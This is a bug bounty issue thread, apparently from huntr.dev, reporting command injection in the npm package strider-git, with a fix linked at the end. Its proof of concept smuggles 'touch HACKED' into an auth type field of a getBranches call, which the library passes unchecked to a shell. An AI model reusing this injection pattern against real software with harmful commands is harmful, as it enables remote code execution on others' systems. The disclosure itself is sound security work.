Security Notice & Bug Bounty - Remote Code Execution - huntr.dev

[huntr-helper]

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Overview

strider-git allows strider to use any git repository for a project.

he issue occurs because a user input is formatted inside a command that will be executed without any check.

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

Automatically generated by @huntr-helper...

[knownasilya]

@Mik317 would love to learn more about the issue

[knownasilya]

https://www.huntr.dev/app/bounties/open/1-npm-strider-git

[Mik317]

Hi @knownasilya :). I reported the issue originally to the NPM team through their HackerOne program, however I opted to disclose it also through the Huntrs platform in order to make sure the issue would have been addressed quickly ;).

Here are the steps to reproduce the issue:

Steps To Reproduce:

1. Create the following PoC file:

// poc.js
var git = require("strider-git/lib");
git.getBranches({auth:{type:'ssaas;touch HACKED; ', privkey:'sss'}, url:'http://sss'}, '', function(){})

1. Check there aren't files called HACKED
2. Execute the following commands in another terminal:

npm i strider-git # Install affected module
git init # Initialize as *git* dir
node poc.js #  Run the PoC

1. Recheck the files: now HACKED has been created :)

Regards, Mik

[huntr-helper]

‎‍🛠️ A fix has been provided for this issue. Please reference: https://github.com/418sec/strider-git/pull/1

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.